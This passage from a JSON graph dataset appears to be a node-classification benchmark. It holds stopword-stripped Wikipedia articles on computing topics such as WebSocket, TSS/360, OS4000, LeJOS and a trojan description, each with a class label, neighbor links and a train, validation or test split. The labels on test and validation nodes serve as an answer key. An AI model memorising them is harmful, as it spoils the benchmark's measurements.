    "neighbors": [
      1273,
      4883,
      8343,
      1305,
      10906,
      2041,
      5407,
      8224,
      9256,
      10924,
      9909,
      823,
      5437,
      10696,
      8535,
      6363,
      9569,
      6246,
      6762,
      10105
    ],
    "mask": "None"
  },
  {
    "node_id": 9825,
    "label": 9,
    "text": "Charles_Brenner_(mathematician):charles brenner mathematician charles hallam brenner american mathematician originator forensic mathematics father joel lee brenner professor mathematics mother frances hallam brenner city councilor briefly mayor palo alto california uncle charles brenner md psychiatrist brenner received b.s stanford university 1967 ph.d. university california los angeles ucla 1984 brenner participated implementation apl\\360 apl\\1130 implemented transpose rotate primitive functions recently brenner specializes use mathematics dna analysis principal areas interest achievement mathematics forensic dna kinship rare haplotype matching dna mixtures couple haplotype papers recently showed haplotypes must much rarer much rarer sample frequency reference population sample brenner ’ symbolic kinship program example assess identification evidence based dna profiles anonymous body arbitrary set presumed relatives widely used mass victim identification projects including identifying 1/3 identified world trade center bodies brenner played key role resolution larry hillblom inheritance case resulting four amerasian children receiving 50 million",
    "neighbors": [
      9993,
      1783,
      1178,
      8987,
      667,
      10668,
      4921,
      9019,
      1099,
      7630,
      2519,
      1883,
      11099,
      11625,
      4331,
      2670,
      8695,
      505,
      3323
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9826,
    "label": 2,
    "text": "IPod_Touch_(6th_generation):ipod touch 6th generation sixth-generation ipod touch stylized marketed ipod touch colloquially known ipod touch 6g ipod touch 6 ipod touch 2015 ipod 6 multipurpose handheld device designed marketed apple inc. touchscreen-based user interface successor ipod touch 5th generation becoming first major update ipod lineup two half years released online apple store july 15 2015 along minor upgrades ipod nano ipod shuffle ipod touch 6th generation officially discontinued apple may 28 2019 release successor ipod touch 7th generation support end 6th generation long discontinuation incompatible ios 13 sixth-generation ipod touch features ios apple mobile operating system user interface ios based concept direct manipulation using multi-touch gestures interface control elements consist sliders switches buttons interaction os includes gestures swipe tap pinch reverse pinch specific definitions within context ios operating system multi-touch interface internal accelerometers used applications respond shaking device one common result undo command rotating vertically one common result switching portrait landscape mode sixth-generation ipod touch ships ios 8.4 released june 30 2015 along apple music play music movies television shows audiobooks podcasts sort media library songs artists albums videos playlists genres composers podcasts audiobooks compilations scrolling achieved swiping finger across screen alternatively headset controls used pause play skip repeat tracks however earpods come sixth-generation ipod touch include remote microphone voice control feature also used identify track play songs playlist specific artist create genius playlist sixth-generation ipod touch supports ios 9 released september 2015 ios 10 released september 2016 ios 11 released september 2017 ios 12 released september 2018 sixth-generation ipod touch support ios 12 made first ipod touch model support five major versions ios far ios 8 ios 12 sixth-generation ipod touch supported latest version apple mobile operating system ios 13 sixth-generation ipod touch features apple a8 apple m8 motion co-processor chipset 64-bit architecture chip ipad mini 4 apple tv 4th gen iphone 6 homepod slightly underclocked 1.1 ghz iphone 6 6 plus clocked 1.4 ghz ipad mini 4 clocked 1.5 ghz due small battery 1gb lpddr3 ram twice amount previous generation ipod touch apple metal graphics technology also compatible ipod touch 6th generation ipod touch features 8mp rear isight camera video record 1080p 30fps 120fps slow-motion mode records 720p camera also supports burst mode led flash unlike 5th-generation version rear camera 6th-generation ipod touch lacks sapphire crystal lens front camera unchanged previous generation 1.2mp sensor record video 720p first ipod touch available 128 gb storage partially filling void left behind ipod classic offered 160 gb storage time discontinued exterior design sixth-generation ipod touch largely identical predecessor exception ipod touch loop button removed available silver gold space gray pink blue product red version available apple stores apple online store although color shade slightly different previous generation sixth-generation ipod touch comes lightning charging cable model also comes earpods without remote mic ipod touch compatible apple airpods wireless headphones announced september 7th 2016 apple special event along iphone 7 released late december 2016 also compatible earpods lightning connector came time iphone 7 remote functions active nate ralph cnet praised device camera quality noted ipod touch exceptional performance criticized middling battery life small display stated considered largely redundant due smartphones tablets sascha segan pcmag also noted poor battery life stated ipod touch still best option anyone would prefer handheld media player n't require intimate relationship cellular carrier",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      11289,
      7706,
      1057,
      1576,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      8253,
      576,
      8783,
      4180,
      10838,
      1623,
      3672,
      3681,
      8806,
      3691,
      2673,
      6264,
      7292,
      2686,
      6783,
      7806,
      10878,
      8842,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      3790,
      2259,
      3286,
      9430,
      3293,
      4318,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      9999,
      784,
      10512,
      4888,
      5912,
      10023,
      4399,
      7983,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      7496,
      2388,
      3928,
      4957,
      6495,
      9063,
      10602,
      3948,
      11629,
      10608,
      2439,
      6023,
      6539,
      7052,
      1428,
      3483,
      2979,
      9123,
      8109,
      2492,
      446,
      7614,
      5058,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      7154,
      11257,
      6654
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9827,
    "label": 9,
    "text": "Graphics_Layout_Engine:graphics layout engine graphics layout engine gle graphics scripting language designed creating publication quality graphs plots diagrams figures slides gle supports various graph types function plots histograms bar graphs scatter plots contour lines color maps surface plots simple flexible set graphing commands complex output created relying gle scripting language full featured subroutines variables logic control gle relies latex text output supports mathematical formula graphs figures gle output formats include eps ps pdf jpeg png gle software dates back early 90 still active development currently gle development hosted sourceforge gle available major operating systems including microsoft windows mac os x unix included gnu/linux distributions debian fedora suse gle licensed bsd license qgle gle user interface licensed gpl license",
    "neighbors": [
      9192,
      9320,
      5612,
      6797,
      3791,
      5492,
      8628,
      9780,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9828,
    "label": 1,
    "text": "Document-oriented_database:document-oriented database document-oriented database document store computer program designed storing retrieving managing document-oriented information also known semi-structured data document-oriented databases one main categories nosql databases popularity term document-oriented database grown use term nosql xml databases subclass document-oriented databases optimized work xml documents graph databases similar add another layer relationship allows link documents rapid traversal document-oriented databases inherently subclass key-value store another nosql database concept difference lies way data processed key-value store data considered inherently opaque database whereas document-oriented system relies internal structure document order extract metadata database engine uses optimization although difference often moot due tools systems conceptually document-store designed offer richer experience modern programming techniques document databases contrast strongly traditional relational database rdb relational databases generally store data separate tables defined programmer single object may spread across several tables document databases store information given object single instance database every stored object different every eliminates need object-relational mapping loading data database central concept document-oriented database notion document document-oriented database implementation differs details definition general assume documents encapsulate encode data information standard format encoding encodings use include xml yaml json bson well binary forms like pdf microsoft office documents ms word excel documents document store roughly equivalent programming concept object required adhere standard schema sections slots parts keys generally programs using objects many different types objects objects often many optional fields every object even class look different document stores similar allow different types documents single store allow fields within optional often allow encoded using different encoding systems example following document encoded json second document might encoded xml two documents share structural elements one another also unique elements structure text data inside document usually referred document content may referenced via retrieval editing methods see unlike relational database every record contains fields leaving unused fields empty empty 'fields either document record example approach allows new information added records without requiring every record database share structure document databases typically provide additional metadata associated stored along document content metadata may related facilities datastore provides organizing documents providing security implementation specific features core operations document-oriented database supports documents similar databases terminology perfectly standardized practitioners recognize crud documents addressed database via unique key represents document key simple identifier id typically string uri path key used retrieve document database typically database retains index key speed document retrieval cases key required create insert document database another defining characteristic document-oriented database beyond simple key-to-document lookup used retrieve document database offers api query language allows user retrieve documents based content metadata example may want query retrieves documents certain field set certain value set query apis query language features available well expected performance queries varies significantly one implementation another likewise specific set indexing options configuration available vary greatly implementation document store varies key-value store theory values key-value store opaque store essentially black boxes may offer search systems similar document store may less understanding organization content document stores use metadata document classify content allowing instance understand one series digits phone number another postal code allows search types data instance phone numbers containing 555 would ignore zip code 55555 document databases typically provide mechanism updating editing content metadata document either allowing replacement entire document individual structural pieces document document database implementations offer variety ways organizing documents including notions sometimes organizational notions vary much logical vs physical e.g disk memory representations document-oriented database specialized key-value store another nosql database category simple key-value store document content opaque document-oriented database provides apis query/update language exposes ability query update based internal structure document difference may moot users need richer query retrieval editing apis typically provided document databases modern key-value stores often include features working metadata blurring lines document stores search engines aka information retrieval systems like elasticsearch provide enough core operations documents fit definition document-oriented database relational database data first categorized number predefined types tables created hold individual entries records type tables define data within record fields meaning every record table overall form administrator also defines relationships tables selects certain fields believe commonly used searching defines indexes key concept relational design data may repeated normally placed table instances related column selected group together foreign key design known database normalization example address book application generally need store contact name optional image one phone numbers one mailing addresses one email addresses canonical relational database tables would created rows predefined fields bit data contact table might include first_name last_name image columns phone_number table might include country_code area_code phone_number type home work etc. phone_number table also contains foreign key column contact_id holds unique id number assigned contact created order recreate original contact database engine uses foreign keys look related items across group tables reconstruct original data contrast document-oriented database may internal structure maps directly onto concept table fields relationships generally n't exist predefined concepts instead data object placed single document stored database single entry address book example document would contain contact name image contact info single record entry accessed key allows database retrieve return document application additional work needed retrieve related data returned single object key difference document-oriented relational models data formats predefined document case cases sort document stored database documents change type form time one wishes add country_flag contact field added new documents inserted effect database existing documents already stored aid retrieval information database document-oriented systems generally allow administrator provide hints database look certain types information work similar fashion indexes relational case also offer ability add additional metadata outside content document instance tagging entries part address book allows programmer retrieve related types information like address book entries provides functionality similar table separates concept categories data physical implementation tables classic normalized relational model objects database represented separate rows data inherent structure beyond given retrieved leads problems trying translate programming objects associated database rows problem known object-relational impedance mismatch document stores closely cases directly map programming objects store often marketed using term nosql xml databases document-oriented databases",
    "neighbors": [
      5632,
      8201,
      2062,
      2068,
      1049,
      5658,
      9245,
      9248,
      10793,
      5677,
      10286,
      2045,
      8762,
      4155,
      11324,
      11327,
      9286,
      2632,
      9290,
      8269,
      7248,
      8788,
      10326,
      7767,
      5210,
      8291,
      10340,
      4200,
      8808,
      2669,
      6775,
      7288,
      3705,
      1146,
      3196,
      2688,
      1156,
      9863,
      3219,
      10389,
      6809,
      4255,
      1697,
      4263,
      2217,
      10413,
      7347,
      9397,
      7868,
      11457,
      6850,
      2757,
      2246,
      3784,
      6346,
      7889,
      10453,
      8408,
      2780,
      734,
      8421,
      10471,
      6383,
      7412,
      6395,
      9467,
      6398,
      11528,
      8979,
      6932,
      7446,
      11030,
      4376,
      5403,
      5917,
      2344,
      5929,
      1325,
      6458,
      1341,
      10048,
      2369,
      5953,
      6470,
      2901,
      10069,
      7512,
      11098,
      8539,
      8554,
      8559,
      6514,
      9075,
      2936,
      4476,
      3462,
      8582,
      10632,
      6027,
      1935,
      2456,
      3481,
      9112,
      1435,
      10137,
      9631,
      9634,
      7076,
      1447,
      7080,
      5546,
      8122,
      9147,
      3004,
      8644,
      6085,
      974,
      2512,
      4055,
      987,
      479,
      4065,
      7650,
      6629,
      490,
      6124,
      2544,
      10737,
      3571,
      502,
      4598,
      4604,
      2557
    ],
    "mask": "None"
  },
  {
    "node_id": 9829,
    "label": 2,
    "text": "TSS_(operating_system):tss operating system ibm time sharing system tss/360 discontinued early time-sharing operating system designed exclusively special model system/360 line mainframes model 67 made available trial basis limited set customers 1967 never officially released supported product ibm tss pioneered number novel features later appeared popular systems mvs tss migrated system/370 303x systems despite many advances novel capabilities tss failed meet expectations eventually canceled tss/370 used basis port unix ibm mainframe tss/360 also inspired development tss-8 operating system tss/360 one first implementations tightly-coupled symmetric multiprocessing pair model 67 mainframes shared common physical memory space ran single copy kernel application code i/o operation launched one processor could end cause interrupt model 67 used standard 360 instruction called test set implement locks code critical sections also implemented virtual memory virtual machines using position-independent code tss/360 included early implementation table driven scheduler user-configured table whose columns parameters current priority working set size number timeslices used date kernel would refer table calculating new priority thread later appeared systems diverse honeywell cp-v ibm z/os standard operating system software time tss/360 customers general motors research laboratories given full access entire source operating system code development tools user-developed improvements patches frequently incorporated official source code tss/360 suffered performance reliability problems lack compatibility os/360 although issues eventually addressed ibm attempted develop tss aggressive schedule large staff programmers compete multics 1967 become evident tss/360 suffering kinds delays os/360 february 1968 time share 30 eighteen s/360-67 sites attempting run tss conference ibm announced via blue letter tss/360 decommitted great blow time-sharing community decision temporarily reversed tss/360 officially canceled 1971 however tss/360 continued quietly available time existing tss/360 customers interim measure tss/360 canceled ibm put primary efforts time sharing option tso time-sharing monitor os/360 several groups developed less ambitious successful time sharing systems s/360-67 notably cp-67 ibm cambridge scientific center early virtual machine monitor evolved vm/370 mts university michigan orvyl stanford university ibm also provided tss/370 prpq migration path existing tss/360 customers went multiple releases tss provides users command-line interface users interact command system command format consists codice_1 command name one eight characters without imbedded blanks operands optional depending command must separated command name least one blank multiple operands separated tab characters commas command lines continued typing hyphen end line continued typing continuation beginning next line multiple commands written line separating semicolons comments allowed command lines separated command semicolon included single quotes operands either positional keyword format keyword=value system commands divided seven categories tss provided early implementation position-independent code ability different processes run single copy executable possibly mapped different virtual addresses process system/360 programs typically contain modifiable data working storage address constants adcons fields containing addresses code data tss virtual addresses differ process running program tss language processors place adcons working storage separate section code called prototype control section psect program loaded dynamic loader makes copy psect relocates adcons reflect virtual addresses assigned within current process therefore user program unique copy psect called program executed general register 13 contains address psect current process address used references variable data addresses",
    "neighbors": [
      6529,
      2179,
      4996,
      6148,
      10883,
      10508,
      7053,
      8077,
      9361,
      6675,
      9468,
      789,
      5397,
      9619,
      11539,
      11673,
      9370,
      6557,
      3359,
      10273,
      421,
      7848,
      6442,
      1323,
      7983,
      8879,
      7217,
      9139,
      10803,
      6325,
      7477,
      7733,
      8502,
      10040,
      5562,
      573,
      3650,
      1219,
      964,
      8388,
      6342,
      4423,
      6087,
      5065,
      8136,
      11075,
      5457,
      1235,
      7507,
      3197,
      9300,
      863,
      3938,
      5603,
      868,
      3429,
      5220,
      6248,
      8553,
      10730,
      5492,
      6772,
      375,
      2168,
      3323,
      2172,
      2813,
      8063
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9830,
    "label": 0,
    "text": "Racter:racter racter artificial intelligence computer program generates english language prose random racter short raconteur written william chamberlain thomas etter existence program revealed 1983 book called policeman beard half constructed described composed entirely program according chamberlain introduction book program apparently ran cp/m machine written compiled basic z80 micro 64k ram version program allegedly wrote book released general public sophistication claimed program likely exaggerated could seen investigation template system text generation however 1984 mindscape inc. released interactive version racter developed inrac corporation dos amiga apple ii computers published racter similar chatterbot basic program released mindscape far less sophisticated anything could written fairly sophisticated prose policeman beard commercial version racter could likened computerized version mad libs game fill blanks advance plug text template produce surrealistic tale commercial program attempted parse text inputs identifying significant nouns verbs would regurgitate create conversations plugging input user phrase templates combined along modules conjugated english verbs contrast text policeman beard apart edited large amount output would product chamberlain specialized templates modules included commercial release program pc magazine described policeman beard scenes surprising frankness reflective concluded book whimsical wise sometimes fun computer gaming world described racter diversion another dimension might best seen paying price ticket try buy",
    "neighbors": [
      6208,
      7780
    ],
    "mask": "Test"
  },
  {
    "node_id": 9831,
    "label": 9,
    "text": "LeJOS:lejos lejos firmware replacement lego mindstorms programmable bricks different variants software support original robotics invention system nxt ev3 includes java virtual machine allows lego mindstorms robots programmed java programming language includes also icommand.jar allows communicate via bluetooth original firmware mindstorm often used teaching java first-year computer science students lejos-based robot jitter flew around international space station december 2001 according official website name lejos conceived josé solórzano based acronym java operating system jos name another operating system rcx legos spanish word lejos lejos originally conceived tinyvm developed josé solórzano late 1999 started hobby open source project later forked known today lejos many contributors joined project provided important enhancements among brian bagnall jürgen stuber paul andrews later took project josé essentially retired august 20 2006 original lejos rcx discontinued 3.0 release soon afterwards icommand library control nxt bluetooth-enabled computer via lcp released library made use standard lego firmware library later superseded lejos nxj 0.8 january 2007 full port new lego mindstorms nxt released firmware replacement far faster x15 rcx version memory available menu system bluetooth support using bluecove library allows access many nxt features 2008 versions 0.5 0.6 0.7 released addition numerous improvements core classes eclipse plugin released along new version tutorial 2009 2 major releases 0.8 0.85 may 2011 0.9 released broadly speaking releases concentrated improvements navigation algorithms well support numerous 3rd party sensors eclipse plug-in 2013 development began port lego mindstorms ev3 brick 2014 0.5 0.6 alpha versions released 2015 beta versions 0.9 0.9.1 released since november 2014 lejos used slightly adapted version also open-source project open roberta lejos nxj provides support access robot i²c ports allows access standard sensors motors ultrasonic distance sensor touch sensor sound sensor light sensor companies mindsensors hitechnic extended basic set providing advanced sensors actuators multiplexers lejos nxj includes java apis products taking advantage object-oriented structure java developers lejos nxj able hide implementation details sensors actuators behind multiple interfaces allows robotics developer work high-level abstractions without worry details like hexadecimal addresses hardware components project includes implementations commonly used feedback controller pid controller kalman filter noise reduction algorithm lejos nxj also provides libraries support abstract functions navigation mapping behavior based robotics simple lejos program since first alpha release lejos nxj 2007 project consistently active following core development team relatively small group contributions accepted members community several interfaces third party sensors actuators contributed members outside core team platform used university robotics courses undergraduate research projects platform robotics research lejos nxj java project builds wealth functionality inherent java platform lejos nxj plugins two leading java ides eclipse netbeans robotics developers take advantage standard functionality ide code completion refactoring testing frameworks well point-and-click implementation nxj functions compiling linking uploading wealth java open source projects apache math likewise available nxj robotics developer",
    "neighbors": [
      352,
      9665,
      6338,
      2179,
      10537,
      5612,
      5677,
      5872,
      10964,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9832,
    "label": 4,
    "text": "Trojan.Win32.FireHooker:trojan.win32.firehooker trojan.win32.firehooker trojan win32/firehooker definition kaspersky labs trojan downloader trojan dropper trojan spy created windows platform first known detection goes back september 2015 according avv trend micro malware requires main component successfully perform intended routine .dll-file name xul.dll file-size 5120 bytes file dropped dns blocking installer additional installers bundled dnsblockers xul.dll known mozilla firefox dll loads order come action following apis dll-file",
    "neighbors": [
      7809,
      131,
      10756,
      10166,
      10392,
      1242,
      858,
      127
    ],
    "mask": "None"
  },
  {
    "node_id": 9833,
    "label": 4,
    "text": "Cyber_Security_Task_Force:cyber security task force cyber security task force organized department public safety emergency preparedness canada jane billings assistant deputy minister current cyber security task force secretariat",
    "neighbors": [
      6323,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 9834,
    "label": 5,
    "text": "WebSocket:websocket websocket computer communications protocol providing full-duplex communication channels single tcp connection websocket protocol standardized ietf rfc 6455 2011 websocket api web idl standardized w3c websocket distinct http protocols located layer 7 osi model depend tcp layer 4 although different rfc 6455 states websocket designed work http ports 80 443 well support http proxies intermediaries thus making compatible http protocol achieve compatibility websocket handshake uses http upgrade header change http protocol websocket protocol websocket protocol enables interaction web browser client application web server lower overhead half-duplex alternatives http polling facilitating real-time data transfer server made possible providing standardized way server send content client without first requested client allowing messages passed back forth keeping connection open way two-way ongoing conversation take place client server communications done tcp port number 80 443 case tls-encrypted connections benefit environments block non-web internet connections using firewall similar two-way browser-server communications achieved non-standardized ways using stopgap technologies comet browsers support protocol including google chrome microsoft edge internet explorer firefox safari opera unlike http websocket provides full-duplex communication additionally websocket enables streams messages top tcp tcp alone deals streams bytes inherent concept message websocket port 80 full-duplex communication attainable using comet channels however comet implementation nontrivial due tcp handshake http header overhead inefficient small messages websocket protocol aims solve problems without compromising security assumptions web websocket protocol specification defines codice_1 websocket codice_2 websocket secure two new uniform resource identifier uri schemes used unencrypted encrypted connections respectively apart scheme name fragment codice_3 supported rest uri components defined use uri generic syntax using browser developer tools developers inspect websocket handshake well websocket frames websocket first referenced tcpconnection html5 specification placeholder tcp-based socket api june 2008 series discussions led michael carter resulted first version protocol known websocket name websocket coined ian hickson michael carter shortly thereafter collaboration whatwg irc chat room subsequently authored inclusion html5 specification ian hickson announced cometdaily blog michael carter december 2009 google chrome 4 first browser ship full support standard websocket enabled default development websocket protocol subsequently moved w3c whatwg group ietf february 2010 authored two revisions ian hickson protocol shipped enabled default multiple browsers rfc finalized ian fette december 2011 secure version websocket protocol implemented firefox 6 safari 6 google chrome 14 opera 12.10 internet explorer 10 detailed protocol test suite report lists conformance browsers specific protocol aspects older less secure version protocol implemented opera 11 safari 5 well mobile version safari ios 4.2 blackberry browser os7 implements websockets vulnerabilities disabled firefox 4 5 opera 11 establish websocket connection client sends websocket handshake request server returns websocket handshake response shown example client request like http line ends codice_4 must extra blank line end server response handshake starts http request/response allowing servers handle http connections well websocket connections port connection established communication switches bidirectional binary protocol conform http protocol addition codice_5 headers client sends codice_6 header containing base64-encoded random bytes server replies hash key codice_7 header intended prevent caching proxy re-sending previous websocket conversation provide authentication privacy integrity hashing function appends fixed string codice_8 guid value codice_6 header decoded base64 applies sha-1 hashing function encodes result using base64 connection established client server send websocket data text frames back forth full-duplex mode data minimally framed small header followed payload websocket transmissions described messages single message optionally split across several data frames allow sending messages initial data available complete length message unknown sends one data frame another end reached marked fin bit extensions protocol also used multiplexing several streams simultaneously instance avoid monopolizing use socket single large payload important security perspective validate origin header connection establishment process server side expected origins avoid cross-site websocket hijacking attacks might possible connection authenticated cookies http authentication better use tokens similar protection mechanisms authenticate websocket connection sensitive private data transferred websocket websocket protocol client implementations try detect user agent configured use proxy connecting destination host port uses http connect method set persistent tunnel websocket protocol unaware proxy servers firewalls features http-compatible handshake thus allowing http servers share default http https ports 80 443 websocket gateway server websocket protocol defines ws // wss // prefix indicate websocket websocket secure connection respectively schemes use http upgrade mechanism upgrade websocket protocol proxy servers transparent work fine websocket others prevent websocket working correctly causing connection fail cases additional proxy server configuration may required certain proxy servers may need upgraded support websocket unencrypted websocket traffic flows explicit transparent proxy server without websockets support connection likely fail encrypted websocket connection used use transport layer security tls websocket secure connection ensures http connect command issued browser configured use explicit proxy server sets tunnel provides low-level end-to-end tcp communication http proxy websocket secure client websocket server case transparent proxy servers browser unaware proxy server http connect sent however since wire traffic encrypted intermediate transparent proxy servers may simply allow encrypted traffic much better chance websocket connection succeed websocket secure used using encryption free resource cost often provides highest success rate since would travelling secure tunnel mid-2010 draft version hixie-76 broke compatibility reverse proxies gateways including eight bytes key data headers advertising data codice_10 header data forwarded intermediates could lead protocol failure recent drafts e.g. hybi-09 put key data codice_6 header solving problem",
    "neighbors": [
      513,
      6657,
      10242,
      9736,
      9229,
      2579,
      1556,
      3604,
      6171,
      9757,
      10269,
      7713,
      35,
      10791,
      9770,
      7212,
      10284,
      559,
      4658,
      4661,
      3639,
      10808,
      2106,
      3643,
      9275,
      64,
      1095,
      5707,
      10834,
      6231,
      8281,
      6747,
      10341,
      1128,
      7784,
      1642,
      9841,
      115,
      9843,
      3191,
      4728,
      4729,
      124,
      637,
      1664,
      5251,
      2182,
      3218,
      1178,
      3229,
      7838,
      8351,
      10910,
      3237,
      7338,
      7340,
      10924,
      6319,
      7855,
      9394,
      9908,
      185,
      6330,
      11449,
      4797,
      6334,
      8386,
      7364,
      11466,
      7885,
      3278,
      11469,
      9424,
      1747,
      4310,
      2777,
      5849,
      8923,
      6366,
      225,
      737,
      4326,
      8425,
      11509,
      10486,
      8443,
      8956,
      257,
      9987,
      9988,
      7943,
      1802,
      10506,
      3341,
      7443,
      1812,
      278,
      7965,
      10526,
      2339,
      10020,
      8998,
      6951,
      1834,
      10026,
      11582,
      2887,
      10057,
      11082,
      2893,
      3920,
      1363,
      5972,
      348,
      4959,
      865,
      11105,
      11112,
      5482,
      8557,
      10622,
      6528,
      10624,
      3971,
      3462,
      8584,
      11154,
      7572,
      4504,
      5531,
      5026,
      11682,
      5543,
      2474,
      10667,
      944,
      6067,
      2485,
      5048,
      1468,
      3517,
      3518,
      5054,
      3008,
      8644,
      6086,
      9167,
      4048,
      5078,
      3545,
      5593,
      479,
      10722,
      5605,
      3558,
      487,
      3560,
      8169,
      10727,
      4589,
      494,
      1520,
      7152,
      8689,
      6133,
      5622,
      5114,
      9726
    ],
    "mask": "None"
  },
  {
    "node_id": 9835,
    "label": 2,
    "text": "OS4000:os4000 os4000 proprietary operating system introduced gec computers limited 1977 successor gec dos range gec 4000 series 16-bit later 32-bit minicomputers os4000 developed late 1990s support-only mode since first operating systems gec 4000 series cos core operating system dos disk operating system basically single-user multi-tasking operating systems designed developing running process control type applications os4000 first released around 1977 reused many parts dos added multi-user access os4000 jcl command-line interpreter batch processing os4000 hierarchical filesystem although on-disk format similar non-hierarchical dos filesystem os4000 jcl based cambridge university phoenix command interpreter os4000 rel 3 arrived around 1980 included linked-os — support linked os4000 operating systems enable multi-node systems constructed main customer central computing service university college london euclid multi-node system consisting hub file server multiple rim multi-access compute server systems provided service 100 simultaneous users linked-os also used construct fail-over process control systems higher resilience os4000 rel 4 arrived around 1983 upped maximum number user modules 150 mainly university college london euclid system together enhanced batch processing system also included support gec 4090 processor introduced 32-bit addressing mode os4000 rel 5 introduced modified version os4000 filesystem called cfsx order allow easier use larger disks initial rel 5 supported cfsx filesystem support original cfs1 filesystem reintroduced well quite quickly os4000 rel 6 introduced support dual processor systems gec 4190d os4000 developed uk gec computers borehamwood offices elstree way gec computers dunstable development centre woodside estate dunstable architecture os4000 heavily based around architecture platform runs gec 4000 series minicomputers rather unusual platform includes feature called nucleus combination hardware firmware based kernel altered program control means many features typically found operating system kernels need included os4000 underlying platform performs functions instead operating system consequently provision running privileged mode code platform—all os4000 operating system code runs processes nucleus supports 256 processes schedules automatically using fixed priority scheme os4000 lives entirely within processes set system tables used configure nucleus access system tables granted processes need alter configuration nucleus e.g load new programs processes adjust nucleus scheduling time-shared processes etc system tables tell nucleus processes permitted communicate updated processes created destroyed e.g users login logout i/o performed directly processes system tables identify processes access peripherals handle peripheral interrupts example device driver disk controller process responsible issuing commands nucleus disk controller handling interrupts passed back disk controller via nucleus system tables explicitly state process access disk controller system tables grant device driver access peripherals event process stopping crashing nucleus looks owner process system tables informs owner process take decision let system continue running without process take system like unix panic take action reload and/or restart process functions filesystems store allocation terminal drivers timing services etc also exist separate processes nucleus implements segmented memory system processes access memory segments defined system tables maintained os4000 os4000 provides memory system handles store-resident memory virtual memory backed disk known overlay overlaying performed segment level os4000 also inherited grouped segments dos group segments overlaid retrieved single group feature little used os4000 process may use mixture resident overlayable segments although process performing real-time tasks would normally designed use resident segments os4000 supports fully mixed set process scheduling within system hard real-time processes soft real-time time-shared background given os4000 also includes full program development test/debug facilities made os4000 ideal developing deploying real-time applications process control high speed time data communications within one system os4000 uses proprietary filesystem filesystem extent based variable block size — different files created different blocksizes ranging 256 bytes 16,384 bytes 256-byte multiples filesystem hierarchical components limited 8 characters codice_1 period used component separator os4000 jcl limits characters file path components upper case letters numbers file path starts context pointer name refers position filesystem followed zero catalogues equivalent unix directories ending filename disk system contains separate independent filesystem volume name disk name top level catalogue master catalogue must one disk mounted volume name codice_2 contains specific files required os4000 larger systems usually additional disks containing user files data files etc although coexist codice_2 disk space permitting users given set initial context pointers point catalogue filesystem users see filesystem hierarchies initial context pointers systems usually configured unprivileged users see users files system files except system executables held codice_4 convention area called codice_5 available users enables transfer/sharing files files os4000 filesystem typed means filesystem hold several different types file understands contents structured common logical files contain record structure split sequential random files random files records length enable seeking record numbers finally text binary files distinguished mainly prevent applications expect textual data accidentally using binary file results set logical file types identified three letters e.g logical sequential text lst logical file types lst lsb lrt lrb converse logical files physical files accessed block time known physical random binary prb files file types pst psb prt also exist theory capabilities prb generally used additionally logical indexed sequential lis filetype isam file always appears sorted key field byte stream byt filetype added rel 6.5 better support os4000 nfs server filetype cat used hold catalogues —it actually lsb file modified filesystem addition files catalogues 3 types symbolic links references ref created point another file catalogue creator ref see initial context pointer either filesystem another filesystem disk pointers odp similar references created point file catalogue seen initial context pointers creating odp privileged operation available system manager support unix style symlinks arbitrary text stored catalogue added rel 6.5 better support os4000 nfs server symlinks created visible nfs clients os4000 also provides non-hierarchical temporary filesystem supports exactly types file permanent filesystems except cat ref odp symlinks file contents stored dedicated temporary filing disk regions file metadata stored memory logged user private temporary filing name space seen logged user even another logged user username user temporary files deleted user logs implicitly system rebooted temporary filenames start percent codice_6 ampersand codice_7 limited 8 characters following shows short multi-access login session case user codice_8 logged issued codice_9 command session left timeout inactivity user logs os4000 jcl command interpreter codice_10 loaded user codice_11 process started reads commands terminal number system commands built codice_10 case command n't built executable binary files loaded codice_13 process run text jcl files opened processed directly codice_10 user normally also gets codice_15 process privileged used load trusted debugging programs real-time process control accounts half os4000 systems deployed systems steel production accounts significant proportion earlier real-time process control systems upgraded dos os4000 x.25 packet switches account significant proportion systems although earlier gec x.25 packet switches ran special operating system called nos cut operating system halfway dos os4000 civil command control systems e.g fire service control systems interfacing emergency telephone operator fire stations prestel uk public videotex systems used many countries many private viewdata systems multi-user minicomputers used many education research establishments os4000 ported gec series 63 minicomputer known os6000 required addition software nucleus emulation feature gec series 63 hardware gec computers dropped os6000 source code given daresbury laboratory main user continued keep step os4000 releases lifetime two gec series 63 systems",
    "neighbors": [
      2179,
      10499,
      10883,
      394,
      1147,
      1804,
      3978,
      6797,
      273,
      7057,
      6675,
      7187,
      11539,
      9366,
      11667,
      6296,
      25,
      10776,
      8092,
      4637,
      7325,
      9887,
      10016,
      9762,
      421,
      5158,
      10235,
      2345,
      5293,
      3374,
      7983,
      3248,
      7217,
      11184,
      6837,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      6207,
      576,
      9151,
      11075,
      8388,
      8262,
      4423,
      8136,
      8393,
      9932,
      5840,
      5457,
      11601,
      7382,
      8410,
      2395,
      10333,
      10590,
      2399,
      97,
      1253,
      8551,
      8298,
      6128,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      2811,
      3197,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 9836,
    "label": 6,
